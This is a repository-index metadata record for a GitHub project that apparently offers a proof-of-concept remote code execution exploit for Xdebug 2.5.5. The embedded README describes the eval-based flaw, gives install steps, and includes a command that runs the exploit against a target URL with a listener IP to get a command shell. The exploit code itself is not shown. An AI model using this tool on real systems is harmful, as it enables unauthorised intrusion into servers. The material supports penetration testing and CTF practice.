{"id":20173762,"url":"https://github.com/d3ext/xdebug-exploit","last_synced_at":"2025-07-19T15:03:03.295Z","repository":{"id":41803335,"uuid":"510351282","full_name":"D3Ext/xdebug-exploit","owner":"D3Ext","description":"xdebug 2.5.5 RCE exploit","archived":false,"fork":false,"pushed_at":"2025-01-16T13:04:04.000Z","size":56,"stargazers_count":30,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-10T03:17:26.456Z","etag":null,"topics":["black-hat","ctf","exploit","hacker","hacking","hackthebox","kali","mrrobot","offensive-security","oscp","owasp","php","python","rce","vuln","vulnerability","xdebug","xdebug-exploit"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-07-04T12:30:17.000Z","updated_at":"2025-02-07T08:05:22.000Z","dependencies_parsed_at":"2022-08-20T12:40:36.227Z","dependency_job_id":null,"html_url":"https://github.com/D3Ext/xdebug-exploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2Fxdebug-exploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D3Ext","download_url":"https:
//codeload.github.com/D3Ext/xdebug-exploit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248148247,"owners_count":21055548,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["black-hat","ctf","exploit","hacker","hacking","hackthebox","kali","mrrobot","offensive-security","oscp","owasp","php","python","rce","vuln","vulnerability","xdebug","xdebug-exploit"],"created_at":"2024-11-14T01:37:48.752Z","updated_at":"2025-04-10T03:17:36.933Z","avatar_url":"https://github.com/D3Ext.png","language":"Python","readme":"# xdebug 2.5.5 RCE\n\nAn automated POC exploit of the xdebug 2.5.5 RCE vulnerability\n\n## Vulnerability\n\nThis vulnerability can be abused due to the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary PHP code in the context of the web user.\n\n## Installation\n\n\u003e Download from source\n```sh\ngit clone https://github.com/D3Ext/xdebug-exploit\ncd xdebug-exploit\npip3 install -r requirements.txt\npython3 exploit.py\n```\n\n## Usage\n\nJust execute the exploit and specify a valid URL with a PHP file like `index.php` and the local host. 
Then the exploit will try to establish a pseudo-terminal which allows you to execute commands.\n\n```sh\npython3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3\n```\n\n\\* *In some cases the output won't be reflected at all and you will only see the first line of the executed command; this is not a problem with the script, the vuln works like this.*\n\n## References\n\n```\nhttps://www.exploit-db.com/exploits/44568\nhttps://www.tenable.com/plugins/nessus/112210\nhttps://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/\n```\n\n## Disclaimer\n\nUse this exploit under your own responsibility! The author is not responsible for any bad usage of it.\n\n## License\n\nThis project is under the [MIT](https://github.com/D3Ext/xdebug-exploit/blob/main/LICENSE) license\n\nCopyright © 2025, *D3Ext*\n\n\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fxdebug-exploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fxdebug-exploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fxdebug-exploit/lists"}